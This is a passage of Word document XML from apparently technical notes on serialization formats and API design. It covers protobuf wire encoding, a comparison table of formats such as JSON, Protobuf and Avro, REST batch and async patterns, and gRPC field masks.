        <w:t xml:space="preserve">  Field 3 (string): 0x1A 0x11 "alice@ex..."   [tag=0x1A, len=17, data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EC0A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Field 4 (varint): 0x20 0x1E                 [tag=0x20, value=30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33014E89" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 5 (varint): 0x28 0x01                 [tag=0x28, value=1=true]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542EBA61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 6 (embedded): 0x32 [len] [Order bytes] (repeated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB10890" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A23050" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Size: ~120 bytes (vs ~250 for JSON — 52% smaller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A244927" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Comparison of Serialization Formats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02"/>
        <w:gridCol w:w="982"/>
        <w:gridCol w:w="1557"/>
        <w:gridCol w:w="1566"/>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="1747"/>
      </w:tblGrid>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="790EB2B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1719B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Format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422BF6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Size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9D7C45" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encode Speed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B53F4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Decode Speed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4A5DD0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Human Readable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FDE387" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="0D7F4E2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EA2BDC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>JSON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A15EA2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Large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B819D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Moderate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C2F370" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Moderate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01F657" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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543B99" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="2B9418E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E6D5E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Protobuf</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A92303" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Small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B0FBFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Very fast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BFE0D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Very fast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218054" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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4509C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="3A7ADA7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8BAC41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>MessagePack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5C3A1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Small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2E5828" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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F8C667" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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E04F62" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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524701" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="377EFAB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1CC12F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Avro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2BDE65" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Small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FFBCFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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01BF6C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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199523" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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7B1FC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Required (separate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="0BEF4C8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6648FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>FlatBuffers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0A859E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Small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B506B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Zero-copy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CE9DBA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Zero-copy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85B1D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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04C467" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="6DCA93B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58B2B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Thrift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CCD9C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Small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CAB687" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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C924B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fast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929238" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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002CFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F90C678" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="12F9549D">
          <v:rect id="_x0000_i6535" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AA310" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. API Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE82DD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 REST Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F4142" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource relationships (sub-resources):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37176D2D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C415EA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /users/42/orders          — Orders belonging to user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35897F2F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /users/42/orders/7        — Specific order of user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E10B5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>POST /users/42/orders         — Create order for user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DA7BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /orders/7/items           — Items in order 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19988C93" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Batch operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C559C80" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B619DB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Batch get (avoid N+1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC2655" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /users?ids=1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50877534" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="77A81C23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Batch create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C592A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>POST /users/batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170549D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEB60A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "users": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA7DEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"name": "Alice", "email": "alice@ex.com"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D6383" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"name": "Bob", "email": "bob@ex.com"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF427A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D60A66" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959E138" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2821E5FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Batch response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37809059" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E68B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "results": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41743223" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"status": 201, "data": {"id": "usr-1", "name": "Alice"}},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B433A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"status": 400, "error": {"message": "Email already exists"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E0CFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B55420" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45692006" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-running operations (async):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE5C32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523D815" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>POST /reports/generate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B258973" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>→ 202 Accepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16E94D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Location: /reports/jobs/abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0117CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="20FACB5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /reports/jobs/abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5058C251" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>→ 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78239036" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  {"status": "processing", "progress": 45, "estimated_completion": "2026-05-28T15:00:00Z"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07607250" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1A0E22EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5EE352" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /reports/jobs/abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724398FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>→ 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2650A702" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  {"status": "completed", "result_url": "/reports/downloads/abc123"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23B8B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 gRPC Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18712449" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Field masks (partial responses — like GraphQL field selection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789D12C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A57DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import "google/protobuf/field_mask.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79425A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="42F34FB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc GetUser(GetUserRequest) returns (User);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B45CADE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0F8460A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message GetUserRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C640B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string user_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316EC7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.FieldMask field_mask = 2;  // Only return requested fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B3FDD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DF3ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6993A1A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACE28C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>req := &amp;pb.GetUserRequest{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C0A20" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    UserId: "42",</w:t>
      </w:r>
    </w:p>
